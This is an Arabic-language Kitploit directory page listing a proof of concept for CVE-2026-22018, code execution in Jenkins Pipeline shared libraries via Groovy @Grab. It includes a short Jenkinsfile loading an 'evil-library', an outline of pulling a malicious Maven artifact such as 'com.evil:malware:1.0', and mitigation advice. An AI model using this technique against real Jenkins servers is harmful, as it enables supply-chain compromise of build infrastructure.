Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab- — PoC لثغرة CVE-2026-22018، وهي ثغرة RCE حرجة في Jenkins Pipeline Shared Library عبر Groovy @Grab، توضح حقن الكود في سلسلة التوريد وخطوات التخفيف. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبDevSecOpsأمن سلسلة التوريد
GitHubgeorge0papasotiriou/cve-2026-22018-jenkins-pipeline-shared-library-code-execution-via-grab-

CVE-2026-22018-Jenkins-Pipeline-Shared-Library-Code-Execution-via-Grab-

PoC لثغرة CVE-2026-22018، وهي ثغرة RCE حرجة في Jenkins Pipeline Shared Library عبر Groovy @Grab، توضح حقن الكود في سلسلة التوريد وخطوات التخفيف.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 16 أياملم تتم المراجعة بعد

CVE-2026-22018 – تنفيذ التعليمات البرمجية عبر المكتبة المشتركة في Jenkins Pipeline باستخدام @Grab

كود البرنامج (Groovy Pipeline)

root@kitploit:~
// Jenkinsfile - loads untrusted shared library
@Library('evil-library@master') _
node {
    evilStep()
}

CVE-2026-22018 – تنفيذ التعليمات البرمجية عن بُعد عبر المكتبة المشتركة في Jenkins Pipeline

Severity: Critical

نظرة عامة

يقوم Jenkins Pipeline بتحميل مكتبة مشتركة من مصدر غير موثوق به تمامًا. تستخدم المكتبة التعليمة التوضيحية @Grab لتنزيل قطع أثرية خارجية من Maven، والتي قد تشتمل على فئة خبيثة تنفّذ التعليمات البرمجية على وحدة تحكم Jenkins أثناء تجميع Groovy.

تفاصيل الثغرة

  • النوع: حقن كود / سلسلة توريد
  • التأثير: اختراق كامل لوحدة تحكم Jenkins.
  • السبب الجذري: تقوم التعليمة التوضيحية @Grab في Groovy بجلب وتحميل ملفات JAR عشوائية في وقت التشغيل؛ والمكتبات المشتركة غير معزولة داخل بيئة رملية (Sandbox).

عرض الاستغلال

قم بتكوين Pipeline بمكتبة غير موثوقة تحتوي على @Grab('com.evil:malware:1.0') في ملف vars/evilStep.groovy. وعند تشغيل Pipeline، يتم تنفيذ كتلة التهيئة الثابتة لملف JAR الخبيث.

التخفيف

  • استخدم المكتبات المشتركة فقط من مستودعات SCM موثوقة وموقّعة.
  • عطّل @Grab عبر إعدادات أمان البيئة الرملية (Sandbox) في Groovy.
  • استخدم خيار “Load implicitly” في Pipeline بحذر.

التثبيت والاستخدام

root@kitploit:~
git clone https://github.com/yourorg/CVE-2026-22018.git
cd CVE-2026-22018
# Set up Jenkins in a lab environment to test.
تنزيل الأداة